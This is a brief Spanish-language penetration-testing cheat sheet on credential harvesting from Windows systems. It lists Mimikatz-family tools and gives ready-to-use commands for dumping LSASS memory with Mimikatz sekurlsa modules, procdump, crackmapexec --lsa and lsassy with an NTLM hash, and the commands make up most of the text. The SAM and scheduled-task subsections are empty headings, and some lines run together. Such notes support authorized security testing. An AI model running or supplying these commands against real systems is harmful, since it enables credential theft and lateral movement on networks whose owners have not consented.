3. Obtención de credenciales
3.1. Herramientas
mimikatz.exe
Invoke-Mimikatz.ps1
SharpKatz.exe
pypykatz.exe3.2. Credenciales en memoria (LSASS)
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"' crackmapexec smb <IP> -u <USER> -p <PASS> --lsa1- Get-Process -Name LSASS
2- .\\procdump.exe -ma <ProcNum> lsass.dmplsassy -u <USER> -H <NTLM> -d <domain.full> <IP> --users3.3. Credenciales locales (SAM)
3.4. Tareas programadas
Last updated